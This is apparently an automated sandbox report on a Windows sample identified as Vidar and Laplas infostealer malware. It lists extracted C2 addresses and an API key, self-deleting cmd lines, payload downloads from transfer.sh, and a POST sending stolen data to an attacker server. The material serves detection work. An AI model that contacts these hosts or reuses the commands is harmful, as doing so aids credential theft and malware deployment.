Analysis
-
max time kernel
108s -
max time network
114s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
12-04-2023 11:40
Static task
static1
Behavioral task
behavioral1
Sample
b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
Resource
win10v2004-20230221-en
General
-
Target
b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
-
Size
471KB
-
MD5
7726ff8db0d30ab03e9548ba7fe27446
-
SHA1
6240309f1205990256778c7d1951a5b095806931
-
SHA256
b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0
-
SHA512
8faeffc97b9e12d5584c532eae7a62a1ff12edf9dc43c8c058c6bdbb4c367be1b47a6ee8da0932f4301f161de3aabb16b2300f436290dddbd5186e850770d19a
-
SSDEEP
12288:DcZT8vz5dXe8c8j4i5RleOkDT6s9Qwze:DOT6k8siXtk/JQd
Malware Config
Extracted
vidar
3.4
e749025c61b2caca10aa829a9e1a65a1
https://steamcommunity.com/profiles/76561199494593681
https://t.me/auftriebs
-
profile_id_v2
e749025c61b2caca10aa829a9e1a65a1
-
user_agent
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Extracted
laplas
http://185.106.92.74
-
api_key
bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396
Signatures
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation 28613429787745026787.exe -
Executes dropped EXE 3 IoCs
pid Process 1668 64403928983640567900.exe 4628 28613429787745026787.exe 2416 svcservice.exe -
Loads dropped DLL 2 IoCs
pid Process 4108 b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe 4108 b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000700000002314e-225.dat upx behavioral1/files/0x000700000002314e-227.dat upx behavioral1/files/0x000700000002314e-228.dat upx behavioral1/memory/1668-229-0x0000000000E40000-0x0000000001CA3000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\telemetry = "C:\\Users\\Admin\\AppData\\Roaming\\telemetry\\svcservice.exe" 28613429787745026787.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 4628 28613429787745026787.exe 4628 28613429787745026787.exe 2416 svcservice.exe 2416 svcservice.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 1328 4108 WerFault.exe 75 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3376 timeout.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4108 b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe 4108 b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe 4628 28613429787745026787.exe 4628 28613429787745026787.exe 2416 svcservice.exe 2416 svcservice.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 4108 wrote to memory of 1668 4108 b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe 84 PID 4108 wrote to memory of 1668 4108 b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe 84 PID 1668 wrote to memory of 700 1668 64403928983640567900.exe 86 PID 1668 wrote to memory of 700 1668 64403928983640567900.exe 86 PID 700 wrote to memory of 1968 700 cmd.exe 88 PID 700 wrote to memory of 1968 700 cmd.exe 88 PID 4108 wrote to memory of 4628 4108 b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe 90 PID 4108 wrote to memory of 4628 4108 b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe 90 PID 4108 wrote to memory of 4628 4108 b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe 90 PID 4108 wrote to memory of 2200 4108 b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe 91 PID 4108 wrote to memory of 2200 4108 b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe 91 PID 4108 wrote to memory of 2200 4108 b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe 91 PID 2200 wrote to memory of 3376 2200 cmd.exe 93 PID 2200 wrote to memory of 3376 2200 cmd.exe 93 PID 2200 wrote to memory of 3376 2200 cmd.exe 93 PID 4628 wrote to memory of 2416 4628 28613429787745026787.exe 97 PID 4628 wrote to memory of 2416 4628 28613429787745026787.exe 97 PID 4628 wrote to memory of 2416 4628 28613429787745026787.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe"C:\Users\Admin\AppData\Local\Temp\b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\ProgramData\64403928983640567900.exe"C:\ProgramData\64403928983640567900.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\64403928983640567900.exe3⤵
- Suspicious use of WriteProcessMemory
PID:700 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 04⤵PID:1968
-
-
-
-
C:\ProgramData\28613429787745026787.exe"C:\ProgramData\28613429787745026787.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2416
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:3376
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 20922⤵
- Program crash
PID:1328
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4108 -ip 41081⤵PID:2772
Network
-
Remote address:8.8.8.8:53Request163.252.72.23.in-addr.arpaIN PTRResponse163.252.72.23.in-addr.arpaIN PTRa23-72-252-163deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request228.249.119.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request71.31.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestt.meIN AResponset.meIN A149.154.167.99
-
Remote address:149.154.167.99:443RequestGET /auftriebs HTTP/1.1
X-Id: e749025c61b2caca10aa829a9e1a65a1
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
Host: t.me
ResponseHTTP/1.1 200 OK
Date: Wed, 12 Apr 2023 11:40:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12361
Connection: keep-alive
Set-Cookie: stel_ssid=4ee4cb3f10cdc6e4a7_16922301135242178653; expires=Thu, 13 Apr 2023 11:40:18 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
-
Remote address:195.201.44.70:80RequestGET / HTTP/1.1
X-Id: e749025c61b2caca10aa829a9e1a65a1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Host: 195.201.44.70
ResponseHTTP/1.1 200 OK
Date: Wed, 12 Apr 2023 11:40:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
GEThttp://195.201.44.70/download.zipb8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exeRemote address:195.201.44.70:80RequestGET /download.zip HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Host: 195.201.44.70
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 12 Apr 2023 11:40:18 GMT
Content-Type: application/zip
Content-Length: 2685679
Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
Connection: keep-alive
ETag: "631f30d3-28faef"
Accept-Ranges: bytes
-
Remote address:195.201.44.70:80RequestPOST / HTTP/1.1
X-Id: e749025c61b2caca10aa829a9e1a65a1
X-Token: 000759fc24095bf4ea3a603e447ba563
X-hwid: bb00a92e19a92127370785-7669410e-8e67-41c6-8402-8218-806e6f6e6963
Content-Type: multipart/form-data; boundary=----3542125965940843
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Host: 195.201.44.70
Content-Length: 98691
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 12 Apr 2023 11:40:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Request99.167.154.149.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request22.249.124.192.in-addr.arpaIN PTRResponse22.249.124.192.in-addr.arpaIN PTRcloudproxy10022sucurinet
-
Remote address:8.8.8.8:53Request70.44.201.195.in-addr.arpaIN PTRResponse70.44.201.195.in-addr.arpaIN PTRstatic7044201195clientsyour-serverde
-
Remote address:8.8.8.8:53Requesttransfer.shIN AResponsetransfer.shIN A144.76.136.153
-
GEThttps://transfer.sh/get/lqTwP6/pipka.exeb8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exeRemote address:144.76.136.153:443RequestGET /get/lqTwP6/pipka.exe HTTP/1.1
Host: transfer.sh
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 12 Apr 2023 11:40:25 GMT
Content-Type: application/x-ms-dos-executable
Content-Length: 4514816
Connection: keep-alive
Cache-Control: no-store
Content-Disposition: attachment; filename="pipka.exe"
Retry-After: Wed, 12 Apr 2023 13:40:24 GMT
X-Made-With: <3 by DutchCoders
X-Ratelimit-Key: 127.0.0.1,154.61.71.13,154.61.71.13
X-Ratelimit-Limit: 10
X-Ratelimit-Rate: 600
X-Ratelimit-Remaining: 9
X-Ratelimit-Reset: 1681299624
X-Remaining-Days: n/a
X-Remaining-Downloads: n/a
X-Served-By: Proudly served by DutchCoders
Strict-Transport-Security: max-age=63072000
-
GEThttps://transfer.sh/get/8n86mq/sima.exeb8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exeRemote address:144.76.136.153:443RequestGET /get/8n86mq/sima.exe HTTP/1.1
Host: transfer.sh
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 12 Apr 2023 11:40:27 GMT
Content-Type: application/x-ms-dos-executable
Content-Length: 7567360
Connection: keep-alive
Cache-Control: no-store
Content-Disposition: attachment; filename="sima.exe"
Retry-After: Wed, 12 Apr 2023 13:40:30 GMT
X-Made-With: <3 by DutchCoders
X-Ratelimit-Key: 127.0.0.1,154.61.71.13,154.61.71.13
X-Ratelimit-Limit: 10
X-Ratelimit-Rate: 600
X-Ratelimit-Remaining: 9
X-Ratelimit-Reset: 1681299630
X-Remaining-Days: n/a
X-Remaining-Downloads: n/a
X-Served-By: Proudly served by DutchCoders
Strict-Transport-Security: max-age=63072000
-
Remote address:8.8.8.8:53Request153.136.76.144.in-addr.arpaIN PTRResponse153.136.76.144.in-addr.arpaIN PTRtransfersh
-
Remote address:8.8.8.8:53Request67.55.52.23.in-addr.arpaIN PTRResponse67.55.52.23.in-addr.arpaIN PTRa23-52-55-67deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request176.25.221.88.in-addr.arpaIN PTRResponse176.25.221.88.in-addr.arpaIN PTRa88-221-25-176deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request123.108.74.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request209.205.72.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request157.123.68.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request151.122.125.40.in-addr.arpaIN PTRResponse
-
Remote address:185.106.92.74:80RequestGET /bot/regex HTTP/1.1
Host: 185.106.92.74
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 12 Apr 2023 11:41:05 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
-
GEThttp://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396svcservice.exeRemote address:185.106.92.74:80RequestGET /bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396 HTTP/1.1
Host: 185.106.92.74
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 12 Apr 2023 11:41:05 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
-
Remote address:185.106.92.74:80RequestGET /bot/regex HTTP/1.1
Host: 185.106.92.74
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 12 Apr 2023 11:42:01 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
-
GEThttp://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396svcservice.exeRemote address:185.106.92.74:80RequestGET /bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396 HTTP/1.1
Host: 185.106.92.74
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 12 Apr 2023 11:42:01 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
-
Remote address:8.8.8.8:53Request74.92.106.185.in-addr.arpaIN PTRResponse74.92.106.185.in-addr.arpaIN PTRinstance25567waicorenetwork
-
149.154.167.99:443https://t.me/auftriebstls, httpb8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe1.6kB 19.5kB 24 20
HTTP Request
GET https://t.me/auftriebsHTTP Response
200 -
195.201.44.70:80http://195.201.44.70/httpb8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe207.1kB 2.8MB 2065 2019
HTTP Request
GET http://195.201.44.70/HTTP Response
200HTTP Request
GET http://195.201.44.70/download.zipHTTP Response
200HTTP Request
POST http://195.201.44.70/HTTP Response
200 -
144.76.136.153:443https://transfer.sh/get/8n86mq/sima.exetls, httpb8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe412.0kB 12.5MB 8944 8927
HTTP Request
GET https://transfer.sh/get/lqTwP6/pipka.exeHTTP Response
200HTTP Request
GET https://transfer.sh/get/8n86mq/sima.exeHTTP Response
200 -
322 B 7
-
185.106.92.74:80http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396httpsvcservice.exe916 B 2.3kB 10 9
HTTP Request
GET http://185.106.92.74/bot/regexHTTP Response
200HTTP Request
GET http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396HTTP Response
200HTTP Request
GET http://185.106.92.74/bot/regexHTTP Response
200HTTP Request
GET http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396HTTP Response
200
-
72 B 137 B 1 1
DNS Request
163.252.72.23.in-addr.arpa
-
73 B 159 B 1 1
DNS Request
228.249.119.40.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
71.31.126.40.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
50 B 66 B 1 1
DNS Request
t.me
DNS Response
149.154.167.99
-
73 B 166 B 1 1
DNS Request
99.167.154.149.in-addr.arpa
-
73 B 113 B 1 1
DNS Request
22.249.124.192.in-addr.arpa
-
72 B 129 B 1 1
DNS Request
70.44.201.195.in-addr.arpa
-
57 B 73 B 1 1
DNS Request
transfer.sh
DNS Response
144.76.136.153
-
73 B 98 B 1 1
DNS Request
153.136.76.144.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
67.55.52.23.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
176.25.221.88.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
123.108.74.40.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
209.205.72.20.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
157.123.68.40.in-addr.arpa
-
73 B 159 B 1 1
DNS Request
151.122.125.40.in-addr.arpa
-
72 B 115 B 1 1
DNS Request
74.92.106.185.in-addr.arpa
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7.2MB
MD5c5e0fb4ecaa8a7481a283099d604f7a0
SHA1df4b0c0cc823da2b0443076650c292b43dd9de33
SHA256c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42
SHA512375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57
-
Filesize
7.2MB
MD5c5e0fb4ecaa8a7481a283099d604f7a0
SHA1df4b0c0cc823da2b0443076650c292b43dd9de33
SHA256c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42
SHA512375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57
-
Filesize
7.2MB
MD5c5e0fb4ecaa8a7481a283099d604f7a0
SHA1df4b0c0cc823da2b0443076650c292b43dd9de33
SHA256c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42
SHA512375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57
-
Filesize
4.3MB
MD5c4ab3149ef02a36d663699a8c541933e
SHA167088f5eff9ec575775b711c9e3650d12d7f4d5c
SHA2560a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce
SHA51288b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4
-
Filesize
4.3MB
MD5c4ab3149ef02a36d663699a8c541933e
SHA167088f5eff9ec575775b711c9e3650d12d7f4d5c
SHA2560a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce
SHA51288b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4
-
Filesize
4.3MB
MD5c4ab3149ef02a36d663699a8c541933e
SHA167088f5eff9ec575775b711c9e3650d12d7f4d5c
SHA2560a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce
SHA51288b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
830.2MB
MD558c4c1e65779c5b0ee7e6409741c66bc
SHA12a4daebb8fd8a776e1066aa28ba98755b8277a1c
SHA2562c286abfebc0b51165e0a0db67fb5b165a700b548b0d6bec58418c8d6322ddbb
SHA512f98cc2e64c134c0783d4bae9cf11ed686abe7e3313ecf7e1e25bfee0c98f214d7f157814dfdecbb24464cf696757b8d632a3ce98819d5e1001e4ab35dfb19547
-
Filesize
830.2MB
MD558c4c1e65779c5b0ee7e6409741c66bc
SHA12a4daebb8fd8a776e1066aa28ba98755b8277a1c
SHA2562c286abfebc0b51165e0a0db67fb5b165a700b548b0d6bec58418c8d6322ddbb
SHA512f98cc2e64c134c0783d4bae9cf11ed686abe7e3313ecf7e1e25bfee0c98f214d7f157814dfdecbb24464cf696757b8d632a3ce98819d5e1001e4ab35dfb19547